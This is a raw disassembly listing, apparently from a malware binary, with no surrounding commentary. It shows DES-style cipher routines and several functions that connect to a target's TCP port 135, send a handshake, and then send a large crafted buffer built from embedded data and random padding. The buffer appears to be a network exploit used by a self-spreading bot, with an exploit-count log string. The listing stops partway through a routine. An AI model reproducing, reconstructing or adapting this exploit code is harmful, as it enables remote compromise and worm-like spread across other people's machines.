sub esp, 0F4h
push ebx
push esi
xor ebx, ebx
push edi
xor ecx, ecx
loc_4034B5: ; CODE XREF: sub_4034A5+37�j
movzx eax, byte_43AE00[ecx]
mov esi, [ebp+arg_0]
mov edx, eax
sar edx, 3
and eax, 7
mov dl, [edx+esi]
test byte_43AD90[eax*2], dl
setnz al
mov [ebp+ecx+var_74], al
inc ecx
cmp ecx, 38h
jl short loc_4034B5
mov [ebp+arg_0], ebx
mov [ebp+var_4], 1Eh
loc_4034E8: ; CODE XREF: sub_4034A5+F2�j
cmp [ebp+arg_4], 1
jnz short loc_4034F3
mov eax, [ebp+var_4]
jmp short loc_4034F8
; ---------------------------------------------------------------------------
loc_4034F3: ; CODE XREF: sub_4034A5+47�j
mov eax, [ebp+arg_0]
add eax, eax
loc_4034F8: ; CODE XREF: sub_4034A5+4C�j
lea ecx, [ebp+eax*4+var_F0]
lea esi, [ebp+eax*4+var_F4]
mov eax, [ebp+arg_0]
xor edx, edx
mov [ecx], ebx
mov [esi], ebx
movzx eax, byte ptr dword_43AE38[eax]
mov edi, eax
loc_403518: ; CODE XREF: sub_4034A5+8E�j
cmp edi, 1Ch
jge short loc_403523
mov bl, [ebp+edi+var_74]
jmp short loc_40352A
; ---------------------------------------------------------------------------
loc_403523: ; CODE XREF: sub_4034A5+76�j
mov bl, [ebp+edi+var_90]
loc_40352A: ; CODE XREF: sub_4034A5+7C�j
mov [ebp+edx+var_3C], bl
inc edx
inc edi
cmp edx, 1Ch
jl short loc_403518
push 1Ch
pop edi
add eax, edi
loc_40353A: ; CODE XREF: sub_4034A5+B0�j
cmp eax, 38h
jge short loc_403545
mov dl, [ebp+eax+var_74]
jmp short loc_40354C
; ---------------------------------------------------------------------------
loc_403545: ; CODE XREF: sub_4034A5+98�j
mov dl, [ebp+eax+var_90]
loc_40354C: ; CODE XREF: sub_4034A5+9E�j
mov [ebp+edi+var_3C], dl
inc edi
inc eax
cmp edi, 38h
jl short loc_40353A
xor ebx, ebx
xor eax, eax
loc_40355B: ; CODE XREF: sub_4034A5+E5�j
lea edx, dword_43AE60[eax]
movzx edi, byte ptr [edx-18h]
cmp [ebp+edi+var_3C], bl
jz short loc_403574
mov edi, dword_43ADA0[eax*4]
or [esi], edi
loc_403574: ; CODE XREF: sub_4034A5+C4�j
movzx edx, byte ptr [edx]
cmp [ebp+edx+var_3C], bl
jz short loc_403586
mov edx, dword_43ADA0[eax*4]
or [ecx], edx
loc_403586: ; CODE XREF: sub_4034A5+D6�j
inc eax
cmp eax, 18h
jl short loc_40355B
sub [ebp+var_4], 2
inc [ebp+arg_0]
cmp [ebp+var_4], 0FFFFFFFEh
jg loc_4034E8
lea eax, [ebp+var_F4]
push eax
call sub_4035AF
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_4034A5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4035AF proc near ; CODE XREF: sub_4034A5+FF�p
var_84 = byte ptr -84h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 84h
push ebx
push esi
push edi
lea edx, [ebp+var_84]
mov [ebp+var_4], 10h
loc_4035C8: ; CODE XREF: sub_4035AF+8D�j
mov eax, [ebp+arg_0]
add [ebp+arg_0], 4
mov ecx, [ebp+arg_0]
add [ebp+arg_0], 4
mov eax, [eax]
mov ecx, [ecx]
mov esi, eax
and esi, 0FC0h
mov edi, eax
shl esi, 4
and edi, 0FC0000h
mov ebx, ecx
or esi, edi
mov edi, ecx
shr edi, 4
and edi, 0FC000h
and ebx, 0FC0h
or edi, ebx
shl esi, 6
shr edi, 6
or esi, edi
mov [edx], esi
mov esi, eax
and esi, 3Fh
and eax, 3F000h
shl esi, 4
or esi, eax
mov eax, ecx
shr eax, 4
shl esi, 0Ch
and eax, 3F00h
and ecx, 3Fh
or esi, eax
add edx, 4
or esi, ecx
mov [edx], esi
add edx, 4
dec [ebp+var_4]
jnz short loc_4035C8
lea eax, [ebp+var_84]
push eax
call sub_403650
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_4035AF endp
; =============== S U B R O U T I N E =======================================
sub_403650 proc near ; CODE XREF: sub_4035AF+96�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
mov eax, offset dword_454A58
loc_403659: ; CODE XREF: sub_403650+18�j
mov edx, [ecx]
add ecx, 4
mov [eax], edx
add eax, 4
cmp eax, offset dword_454AD8
jb short loc_403659
retn
sub_403650 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40366B proc near ; CODE XREF: sub_407F55+49�p
var_8 = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
lea eax, [ebp+var_8]
push eax
push [ebp+arg_0]
call sub_40369B
lea eax, [ebp+var_8]
push offset dword_454A58
push eax
call sub_403721
push [ebp+arg_4]
lea eax, [ebp+var_8]
push eax
call sub_4036E8
add esp, 18h
leave
retn
sub_40366B endp
; =============== S U B R O U T I N E =======================================
sub_40369B proc near ; CODE XREF: sub_40366B+C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
mov eax, [esp+arg_4]
movzx edx, byte ptr [ecx]
shl edx, 18h
inc ecx
mov [eax], edx
movzx edx, byte ptr [ecx]
shl edx, 10h
or [eax], edx
inc ecx
xor edx, edx
mov dh, [ecx]
or [eax], edx
inc ecx
movzx edx, byte ptr [ecx]
or [eax], edx
inc ecx
add eax, 4
movzx edx, byte ptr [ecx]
shl edx, 18h
inc ecx
mov [eax], edx
movzx edx, byte ptr [ecx]
shl edx, 10h
or [eax], edx
inc ecx
xor edx, edx
mov dh, [ecx]
or [eax], edx
mov edx, [eax]
movzx ecx, byte ptr [ecx+1]
or ecx, edx
mov [eax], ecx
retn
sub_40369B endp
; =============== S U B R O U T I N E =======================================
sub_4036E8 proc near ; CODE XREF: sub_40366B+26�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
mov eax, [esp+arg_4]
mov dl, [ecx+3]
mov [eax], dl
mov dl, [ecx+2]
inc eax
mov [eax], dl
mov dl, [ecx+1]
inc eax
mov [eax], dl
mov dl, [ecx]
inc eax
add ecx, 4
mov [eax], dl
mov dl, [ecx+3]
inc eax
mov [eax], dl
mov dl, [ecx+2]
inc eax
mov [eax], dl
mov dl, [ecx+1]
inc eax
mov [eax], dl
mov cl, [ecx]
mov [eax+1], cl
retn
sub_4036E8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403721 proc near ; CODE XREF: sub_40366B+1A�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov edx, [eax]
mov ecx, [eax+4]
mov eax, edx
mov esi, 0F0F0F0Fh
shr eax, 4
mov edi, ecx
and eax, esi
and edi, esi
mov [ebp+var_4], 8
xor eax, edi
xor ecx, eax
shl eax, 4
xor edx, eax
mov esi, ecx
mov eax, edx
and esi, 0FFFFh
shr eax, 10h
xor eax, esi
mov esi, 33333333h
xor ecx, eax
shl eax, 10h
xor edx, eax
mov eax, ecx
shr eax, 2
mov edi, edx
and eax, esi
and edi, esi
mov esi, 0FF00FFh
xor eax, edi
xor edx, eax
shl eax, 2
xor ecx, eax
mov edi, edx
mov eax, ecx
and edi, esi
shr eax, 8
and eax, esi
xor eax, edi
xor edx, eax
shl eax, 8
xor ecx, eax
mov eax, ecx
add ecx, ecx
shr eax, 1Fh
or eax, ecx
mov ecx, eax
xor ecx, edx
and ecx, 0AAAAAAAAh
xor edx, ecx
xor eax, ecx
mov ecx, edx
add edx, edx
shr ecx, 1Fh
or ecx, edx
loc_4037B8: ; CODE XREF: sub_403721+1BA�j
mov edi, [ebp+arg_4]
mov esi, eax
mov edx, eax
shl esi, 1Ch
shr edx, 4
or esi, edx
xor esi, [edi]
add edi, 4
mov edx, esi
mov ebx, esi
shr edx, 18h
and edx, 3Fh
shr ebx, 10h
mov edx, dword_43AE78[edx*4]
and ebx, 3Fh
or edx, dword_43B078[ebx*4]
mov ebx, esi
shr ebx, 8
and ebx, 3Fh
and esi, 3Fh
or edx, dword_43B278[ebx*4]
or edx, dword_43B478[esi*4]
mov esi, [edi]
add edi, 4
xor esi, eax
mov [ebp+arg_4], edi
mov edi, esi
shr edi, 18h
mov ebx, esi
and edi, 3Fh
shr ebx, 10h
mov edi, dword_43AF78[edi*4]
and ebx, 3Fh
or edi, dword_43B178[ebx*4]
mov ebx, esi
shr ebx, 8
and ebx, 3Fh
and esi, 3Fh
or edi, dword_43B378[ebx*4]
or edi, dword_43B578[esi*4]
or edi, edx
xor ecx, edi
mov edi, [ebp+arg_4]
mov esi, ecx
mov edx, ecx
shl esi, 1Ch
shr edx, 4
or esi, edx
xor esi, [edi]
add edi, 4
mov edx, esi
mov ebx, esi
shr edx, 18h
and edx, 3Fh
shr ebx, 10h
mov edx, dword_43AE78[edx*4]
and ebx, 3Fh
or edx, dword_43B078[ebx*4]
mov ebx, esi
shr ebx, 8
and ebx, 3Fh
and esi, 3Fh
or edx, dword_43B278[ebx*4]
or edx, dword_43B478[esi*4]
mov esi, [edi]
add edi, 4
xor esi, ecx
mov [ebp+arg_4], edi
mov edi, esi
shr edi, 18h
mov ebx, esi
and edi, 3Fh
shr ebx, 10h
mov edi, dword_43AF78[edi*4]
and ebx, 3Fh
or edi, dword_43B178[ebx*4]
mov ebx, esi
shr ebx, 8
and ebx, 3Fh
or edi, dword_43B378[ebx*4]
and esi, 3Fh
or edi, dword_43B578[esi*4]
or edi, edx
xor eax, edi
dec [ebp+var_4]
jnz loc_4037B8
mov edx, eax
shl edx, 1Fh
shr eax, 1
or edx, eax
mov eax, edx
xor eax, ecx
and eax, 0AAAAAAAAh
xor ecx, eax
xor edx, eax
mov esi, ecx
mov edi, edx
shl esi, 1Fh
shr ecx, 1
or esi, ecx
mov ecx, 0FF00FFh
mov eax, esi
and edi, ecx
shr eax, 8
and eax, ecx
mov ecx, 33333333h
xor eax, edi
xor edx, eax
shl eax, 8
xor esi, eax
mov edi, edx
mov eax, esi
and edi, ecx
shr eax, 2
and eax, ecx
xor eax, edi
xor edx, eax
shl eax, 2
xor esi, eax
mov eax, edx
mov ecx, esi
shr eax, 10h
and ecx, 0FFFFh
xor eax, ecx
mov ecx, 0F0F0F0Fh
xor esi, eax
shl eax, 10h
xor edx, eax
mov edi, esi
mov eax, edx
and edi, ecx
shr eax, 4
and eax, ecx
mov ecx, [ebp+arg_0]
xor eax, edi
mov edi, eax
shl edi, 4
xor edi, edx
xor eax, esi
mov [ecx], edi
pop edi
pop esi
mov [ecx+4], eax
pop ebx
leave
retn
sub_403721 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403970 proc near ; CODE XREF: sub_403B9B+9A�p
var_2004 = byte ptr -2004h
var_1FE0 = byte ptr -1FE0h
var_1FD4 = byte ptr -1FD4h
var_1F2D = byte ptr -1F2Dh
var_1004 = byte ptr -1004h
var_FFC = dword ptr -0FFCh
var_FF4 = dword ptr -0FF4h
var_F84 = dword ptr -0F84h
var_F80 = dword ptr -0F80h
var_F50 = dword ptr -0F50h
var_F4C = dword ptr -0F4Ch
var_F34 = dword ptr -0F34h
var_E78 = dword ptr -0E78h
var_CA4 = dword ptr -0CA4h
var_C9C = dword ptr -0C9Ch
var_C94 = byte ptr -0C94h
var_4 = dword ptr -4
arg_C4 = dword ptr 0CCh
arg_C8 = dword ptr 0D0h
push ebp
mov ebp, esp
mov eax, 2004h
call sub_429B60
push esi
push edi
mov edi, dword_43BB98
mov esi, 0A7h
test edi, edi
mov [ebp+var_4], esi
jnz short loc_403998
xor eax, eax
jmp loc_403B97
; ---------------------------------------------------------------------------
loc_403998: ; CODE XREF: sub_403970+1F�j
push ebx
push 30h
lea eax, [ebp+var_2004]
push offset off_43BAB4
push eax
call sub_429420
push esi
lea eax, [ebp+var_1FD4]
push 0FFFFFF90h
push eax
call sub_429760
mov ebx, offset dword_43A8E8
push edi
lea eax, [ebp+var_1F2D]
push ebx
push eax
call sub_429420
lea esi, [edi+0D7h]
jmp short loc_403A12
; ---------------------------------------------------------------------------
loc_4039D6: ; CODE XREF: sub_403970+B0�j
mov esi, [ebp+var_4]
push 30h
lea eax, [ebp+var_2004]
inc esi
push offset off_43BAB4
push eax
mov [ebp+var_4], esi
call sub_429420
push esi
lea eax, [ebp+var_1FD4]
push 0FFFFFF90h
push eax
call sub_429760
push edi
lea eax, [ebp+esi+var_1FD4]
push ebx
push eax
call sub_429420
lea esi, [esi+edi+30h]
loc_403A12: ; CODE XREF: sub_403970+64�j
add esp, 24h
mov eax, esi
cdq
push 10h
pop ecx
idiv ecx
cmp edx, 0Ch
jnz short loc_4039D6
cmp [ebp+arg_C8], 3
jnz short loc_403A41
push 4
lea eax, [ebp+var_1FE0]
push offset dword_43BB94
push eax
call sub_429420
add esp, 0Ch
loc_403A41: ; CODE XREF: sub_403970+B9�j
cmp [ebp+arg_C8], 2
jnz short loc_403A60
push 4
lea eax, [ebp+var_1FE0]
push offset dword_43BB90
push eax
call sub_429420
add esp, 0Ch
loc_403A60: ; CODE XREF: sub_403970+D8�j
push 360h
lea eax, [ebp+var_1004]
push offset dword_43B6C8
push eax
call sub_429420
push 10h
lea eax, [ebp+var_CA4]
push offset dword_43BA2C
push eax
call sub_429420
lea eax, [ebp+var_2004]
push esi
push eax
lea eax, [ebp+var_C94]
push eax
call sub_429420
lea edi, [esi+370h]
push 3Ch
push offset off_43BA40
lea eax, [ebp+edi+var_1004]
push eax
call sub_429420
add edi, 3Ch
push 30h
push offset dword_43BA80
lea eax, [ebp+edi+var_1004]
push eax
call sub_429420
mov eax, esi
add edi, 30h
cdq
sub eax, edx
sar eax, 1
add [ebp+var_CA4], eax
add [ebp+var_C9C], eax
mov eax, [ebp+var_FFC]
lea eax, [eax+esi-0Ch]
mov [ebp+var_FFC], eax
mov eax, [ebp+var_FF4]
lea eax, [eax+esi-0Ch]
mov [ebp+var_FF4], eax
mov eax, [ebp+var_F84]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F84], eax
mov eax, [ebp+var_F80]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F80], eax
mov eax, [ebp+var_F50]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F50], eax
mov eax, [ebp+var_F4C]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F4C], eax
mov eax, [ebp+var_F34]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F34], eax
mov eax, [ebp+var_E78]
lea eax, [eax+esi-0Ch]
lea esi, [edi+1]
push esi
mov [ebp+var_E78], eax
call sub_4297B8
add esp, 40h
mov ebx, eax
push esi
push 0
push ebx
call sub_429760
lea eax, [ebp+var_1004]
push edi
push eax
push ebx
call sub_429420
mov eax, [ebp+arg_C4]
add esp, 18h
mov [eax], edi
mov eax, ebx
pop ebx
loc_403B97: ; CODE XREF: sub_403970+23�j
pop edi
pop esi
leave
retn
sub_403970 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403B9B proc near ; CODE XREF: sub_402675+174�p
; sub_406D7F+1C5�p
; DATA XREF: ...
var_101C = byte ptr -101Ch
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
arg_B4 = dword ptr 0BCh
arg_BC = dword ptr 0C4h
arg_C4 = dword ptr 0CCh
push ebp
mov ebp, esp
mov eax, 101Ch
call sub_429B60
push ebx
push esi
push edi
lea eax, [ebp+arg_8]
push 1
push eax
call sub_404525
mov esi, eax
xor ebx, ebx
pop ecx
cmp esi, ebx
pop ecx
jnz short loc_403BCF
lea eax, [ebp+arg_8]
push 5
push eax
call sub_404525
pop ecx
mov esi, eax
pop ecx
loc_403BCF: ; CODE XREF: sub_403B9B+23�j
cmp esi, 9
jz loc_403CAA
push ebx
push 1
push 2
call dword_456FD0 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_403CAA
push 10h
lea eax, [ebp+var_1C]
push ebx
push eax
call sub_429760
add esp, 0Ch
mov [ebp+var_1C], 2
push 87h
call dword_456F38 ; ntohs
mov [ebp+var_1A], ax
lea eax, [ebp+arg_8]
push eax
call dword_456F7C ; inet_addr
mov [ebp+var_18], eax
lea eax, [ebp+var_C]
push esi
push eax
sub esp, 0C4h
lea esi, [ebp+arg_8]
push 31h
pop ecx
mov edi, esp
rep movsd
call sub_403970
mov edi, eax
add esp, 0CCh
cmp edi, ebx
mov [ebp+var_8], edi
jnz short loc_403C4E
push [ebp+var_4]
jmp short loc_403CA4
; ---------------------------------------------------------------------------
loc_403C4E: ; CODE XREF: sub_403B9B+AC�j
mov esi, [ebp+var_4]
lea eax, [ebp+var_1C]
push 10h
push eax
push esi
call dword_456EBC ; connect
cmp eax, 0FFFFFFFFh
jz short loc_403C9C
push ebx
push 48h
push offset dword_43B678
push esi
call dword_456F8C ; send
cmp eax, 0FFFFFFFFh
jz short loc_403C9C
push ebx
lea eax, [ebp+var_101C]
push 1000h
push eax
push esi
call dword_456F58 ; recv
push ebx
push [ebp+var_C]
push edi
push esi
call dword_456F8C ; send
cmp eax, 0FFFFFFFFh
jnz short loc_403CB1
loc_403C9C: ; CODE XREF: sub_403B9B+C6�j
; sub_403B9B+DA�j
push edi
call sub_4298F2
pop ecx
push esi
loc_403CA4: ; CODE XREF: sub_403B9B+B1�j
call dword_456FF0 ; closesocket
loc_403CAA: ; CODE XREF: sub_403B9B+37�j
; sub_403B9B+4E�j
xor eax, eax
jmp loc_403D7F
; ---------------------------------------------------------------------------
loc_403CB1: ; CODE XREF: sub_403B9B+FF�j
push 7D0h
call dword_437190 ; Sleep
movzx eax, word_44399E
push eax
lea esi, [ebp+arg_8]
sub esp, 0C4h
push 31h
pop ecx
mov edi, esp
rep movsd
call sub_401B6E
add esp, 0C8h
test eax, eax
jz short loc_403D60
mov edx, [ebp+arg_B4]
mov edi, offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
mov eax, edx
mov esi, offset aSSSExD ; "%s %s -> %s (Ex: %d)"
shl eax, 6
lea ecx, dword_43A380[eax]
inc dword ptr [ecx]
cmp [ebp+arg_C4], ebx
mov ecx, [ecx]
jz short loc_403D34
cmp [ebp+arg_BC], ebx
jnz short loc_403D3C
push ecx
lea ecx, [ebp+arg_8]
lea eax, dword_43A357[eax]
push ecx
push eax
push edi
push esi
push [ebp+arg_0]
push [ebp+arg_4]
call sub_41CE4A
mov edx, [ebp+arg_B4]
add esp, 1Ch
loc_403D34: ; CODE XREF: sub_403B9B+16D�j
cmp [ebp+arg_BC], ebx
jz short loc_403D60
loc_403D3C: ; CODE XREF: sub_403B9B+175�j
shl edx, 6
lea eax, [ebp+arg_8]
push dword_43A380[edx]
push eax
lea eax, dword_43A357[edx]
push eax
push edi
push esi
push [ebp+arg_0]
push [ebp+arg_4]
call sub_41CDD4
add esp, 1Ch
loc_403D60: ; CODE XREF: sub_403B9B+146�j
; sub_403B9B+19F�j
push [ebp+var_8]
call sub_4298F2
pop ecx
push [ebp+var_4]
call dword_456FF0 ; closesocket
lea eax, [ebp+arg_8]
push eax
call sub_401E9E
xor eax, eax
pop ecx
inc eax
loc_403D7F: ; CODE XREF: sub_403B9B+111�j
pop edi
pop esi
pop ebx
leave
retn
sub_403B9B endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 197Ch
call sub_429B60
push ebx
push esi
push edi
xor edi, edi
push 10h
lea eax, [ebp-14h]
push edi
push eax
call sub_429760
push 2
lea eax, [ebp+10h]
pop esi
push eax
mov [ebp-14h], si
call sub_41E3EC
add esp, 10h
mov [ebp-10h], eax
push 87h
call dword_4372C4 ; ntohs
push edi
push edi
push edi
push 6
push 1
push esi
mov [ebp-12h], ax
call dword_4372C8 ; WSASocketA
mov ebx, eax
cmp ebx, edi
mov [ebp-4], ebx
jnz short loc_403DE5
push edi
call dword_437174 ; ExitThread
loc_403DE5: ; CODE XREF: .text:00403DDC�j
lea eax, [ebp-14h]
push 10h
push eax
push ebx
call dword_4372CC ; connect
cmp eax, 0FFFFFFFFh
push edi
jnz short loc_403DFE
call dword_437174 ; ExitThread
loc_403DFE: ; CODE XREF: .text:00403DF6�j
push 48h
push offset dword_43BBA0
push ebx
call dword_4372D0 ; send
cmp eax, 0FFFFFFFFh
push edi
jnz short loc_403E18
call dword_437174 ; ExitThread
loc_403E18: ; CODE XREF: .text:00403E10�j
lea eax, [ebp-197Ch]
push 1000h
push eax
push ebx
call dword_4372D4 ; recv
cmp eax, 0FFFFFFFFh
jnz short loc_403E37
push edi
call dword_437174 ; ExitThread
loc_403E37: ; CODE XREF: .text:00403E2E�j
mov ebx, 168h
loc_403E3C: ; CODE XREF: .text:00403E51�j
push 5Ah
push 41h
call sub_41E415
mov [ebp+edi-17Ch], al
inc edi
pop ecx
cmp edi, ebx
pop ecx
jl short loc_403E3C
push 0Ah
lea eax, [ebp-90h]
push offset loc_43BC90
push eax
call sub_429420
push esi
lea eax, [ebp-86h]
push offset loc_43BCE0
push eax
call sub_429420
push 4
lea eax, [ebp-82h]
pop edi
push edi
push offset loc_43BCD8
push eax
call sub_429420
push esi
lea eax, [ebp-4Ah]
push offset loc_43BCDC
push eax
call sub_429420
push edi
lea eax, [ebp-46h]
push (offset loc_43BCD3+1)
push eax
call sub_429420
push 0Bh
lea eax, [ebp-42h]
push offset loc_43BC84
push eax
call sub_429420
add esp, 48h
lea eax, [ebp-97Ch]
push 18h
push offset dword_43BBEC
push eax
call sub_429420
push 44h
lea eax, [ebp-964h]
push offset dword_43BC08
push eax
call sub_429420
mov esi, 90h
push 20h
lea eax, [ebp-920h]
push esi
push eax
call sub_429760
push edi
lea eax, [ebp-900h]
push offset loc_43BC9C
push eax
call sub_429420
push edi
lea eax, [ebp-8FCh]
push offset loc_43BCD0
push eax
call sub_429420
push edi
lea eax, [ebp-8F8h]
push offset dword_43BCC8
push eax
call sub_429420
add esp, 48h
lea eax, [ebp-8F4h]
push edi
push offset loc_43BCCC
push eax
call sub_429420
push 58h
lea eax, [ebp-8F0h]
push esi
push eax
call sub_429760
push 6
lea eax, [ebp-898h]
push offset loc_43BCA4
push eax
call sub_429420
push 8
lea eax, [ebp-892h]
push esi
push eax
call sub_429760
push edi
lea eax, [ebp-88Ah]
push offset loc_43BCAC
push eax
call sub_429420
push edi
lea eax, [ebp-886h]
push esi
push eax
call sub_429760
add esp, 48h
lea eax, [ebp-882h]
push 6
push offset loc_43BCB4
push eax
call sub_429420
push 28Eh
lea eax, [ebp-87Ch]
push esi
push eax
call sub_429760
push 158h
lea eax, [ebp-5EEh]
push offset dword_43A8E8
push eax
call sub_429420
lea eax, [ebp-17Ch]
push ebx
push eax
lea eax, [ebp-496h]
push eax
call sub_429420
push 0Ah
lea eax, [ebp-32Eh]
push offset off_43BCBC
push eax
call sub_429420
push 32h
lea eax, [ebp-324h]
push offset dword_43BC50
push eax
call sub_429420
add esp, 48h
loc_40400F: ; DATA XREF: .text:0043B3E0�o
xor ebx, ebx
mov eax, 68Ah
mov dword ptr [ebp-96Ch], 672h
push ebx
mov [ebp-974h], eax
push eax
lea eax, [ebp-97Ch]
push eax
push dword ptr [ebp-4]
call dword_4372D0 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_404044
push ebx
call dword_437174 ; ExitThread
loc_404044: ; CODE XREF: .text:0040403B�j
movzx eax, word_44399E
push eax
lea esi, [ebp+10h]
sub esp, 0C4h
push 31h
pop ecx
mov edi, esp
rep movsd
call sub_401B6E
add esp, 0C8h
test eax, eax
jz loc_4040F7
push 7D0h
call dword_437190 ; Sleep
mov edx, [ebp+0BCh]
mov edi, offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
mov eax, edx
mov esi, offset aSSSExD ; "%s %s -> %s (Ex: %d)"
shl eax, 6
lea ecx, dword_43A380[eax]
inc dword ptr [ecx]
cmp [ebp+0CCh], ebx
mov ecx, [ecx]
jz short loc_4040CB
cmp [ebp+0C4h], ebx
jnz short loc_4040D3
push ecx
lea ecx, [ebp+10h]
lea eax, dword_43A357[eax]
push ecx
push eax
push edi
push esi
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
call sub_41CE4A
mov edx, [ebp+0BCh]
add esp, 1Ch
loc_4040CB: ; CODE XREF: .text:0040409F�j
cmp [ebp+0C4h], ebx
jz short loc_4040F7
loc_4040D3: ; CODE XREF: .text:004040A7�j
shl edx, 6
lea eax, [ebp+10h]
push dword_43A380[edx]
push eax
lea eax, dword_43A357[edx]
push eax
push edi
push esi
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
call sub_41CDD4
add esp, 1Ch
loc_4040F7: ; CODE XREF: .text:00404069�j
; .text:004040D1�j
push ebx
lea eax, [ebp-197Ch]
push 1000h
push eax
push dword ptr [ebp-4]
call dword_4372D4 ; recv
cmp eax, 0FFFFFFFFh
jnz short loc_404119
push ebx
call dword_437174 ; ExitThread
loc_404119: ; CODE XREF: .text:00404110�j
push dword ptr [ebp-4]
call dword_4372D8 ; closesocket
lea eax, [ebp+10h]
push eax
call sub_401E9E
pop ecx
push 1
call dword_437174 ; ExitThread
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404134 proc near ; CODE XREF: sub_406D7F+25F�p
var_3020 = byte ptr -3020h
var_2020 = byte ptr -2020h
var_1FFC = byte ptr -1FFCh
var_1FF0 = byte ptr -1FF0h
var_1EA2 = byte ptr -1EA2h
var_1020 = byte ptr -1020h
var_1018 = dword ptr -1018h
var_1010 = dword ptr -1010h
var_FA0 = dword ptr -0FA0h
var_F9C = dword ptr -0F9Ch
var_F6C = dword ptr -0F6Ch
var_F68 = dword ptr -0F68h
var_F50 = dword ptr -0F50h
var_E94 = dword ptr -0E94h
var_CC0 = dword ptr -0CC0h
var_CB8 = dword ptr -0CB8h
var_CB0 = byte ptr -0CB0h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
arg_B4 = dword ptr 0BCh
arg_BC = dword ptr 0C4h
arg_C4 = dword ptr 0CCh
push ebp
mov ebp, esp
mov eax, 3020h
call sub_429B60
push ebx
push esi
push edi
lea eax, [ebp+arg_8]
mov esi, 0A7h
push 1
push eax
mov [ebp+var_C], esi
call sub_404525
pop ecx
mov [ebp+var_4], eax
test eax, eax
pop ecx
jnz short loc_404170
lea eax, [ebp+arg_8]
push 5
push eax
call sub_404525
pop ecx
mov [ebp+var_4], eax
pop ecx
loc_404170: ; CODE XREF: sub_404134+2A�j
cmp [ebp+var_4], 1
jz loc_4044D1
cmp [ebp+var_4], 9
jz loc_4044D1
push 6
push 1
push 2
call dword_456FD0 ; socket
loc_404190: ; DATA XREF: peei:0067C95F�o
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jz loc_4044D1
push 10h
lea eax, [ebp+var_20]
push 0
push eax
call sub_429760
add esp, 0Ch
mov [ebp+var_20], 2
push 87h
call dword_456F38 ; ntohs
mov [ebp+var_1E], ax
lea eax, [ebp+arg_8]
push eax
call dword_456F7C ; inet_addr
mov [ebp+var_1C], eax
push 30h
lea eax, [ebp+var_2020]
push offset off_43C124
push eax
call sub_429420
push esi
lea eax, [ebp+var_1FF0]
push 0FFFFFF90h
push eax
call sub_429760
mov ebx, 158h
mov edi, offset dword_43A8E8
push ebx
lea eax, [ebp+var_1EA2]
push edi
push eax
call sub_429420
add esp, 24h
mov esi, 2D6h
loc_404210: ; CODE XREF: sub_404134+13A�j
inc esi
push esi
call sub_4297B8
mov esi, [ebp+var_C]
mov [ebp+var_10], eax
push 30h
lea eax, [ebp+var_2020]
inc esi
push offset off_43C124
push eax
mov [ebp+var_C], esi
call sub_429420
push esi
lea eax, [ebp+var_1FF0]
push 0FFFFFF90h
push eax
call sub_429760
push ebx
lea eax, [ebp+esi+var_1FF0]
push edi
push eax
call sub_429420
push [ebp+var_10]
add esi, 188h
call sub_4298F2
add esp, 2Ch
mov eax, esi
cdq
push 10h
pop ecx
idiv ecx
cmp edx, 0Ch
jnz short loc_404210
cmp [ebp+var_4], 3
jnz short loc_40428C
push 4
lea eax, [ebp+var_1FFC]
push offset dword_43C204
push eax
call sub_429420
add esp, 0Ch
loc_40428C: ; CODE XREF: sub_404134+140�j
cmp [ebp+var_4], 2
jnz short loc_4042A8
push 4
lea eax, [ebp+var_1FFC]
push offset dword_43C200
push eax
call sub_429420
add esp, 0Ch
loc_4042A8: ; CODE XREF: sub_404134+15C�j
push 360h
lea eax, [ebp+var_1020]
push offset dword_43BD38
push eax
call sub_429420
push 10h
lea eax, [ebp+var_CC0]
push offset dword_43C09C
push eax
call sub_429420
lea eax, [ebp+var_2020]
push esi
push eax
lea eax, [ebp+var_CB0]
push eax
call sub_429420
lea edi, [esi+370h]
push 3Ch
push offset off_43C0B0
lea eax, [ebp+edi+var_1020]
push eax
call sub_429420
add edi, 3Ch
push 30h
push offset dword_43C0F0
lea eax, [ebp+edi+var_1020]
push eax
call sub_429420
mov eax, esi
add esp, 3Ch
cdq
sub eax, edx
push 10h
sar eax, 1
add [ebp+var_CC0], eax
add [ebp+var_CB8], eax
mov eax, [ebp+var_1018]
lea eax, [eax+esi-0Ch]
mov [ebp+var_1018], eax
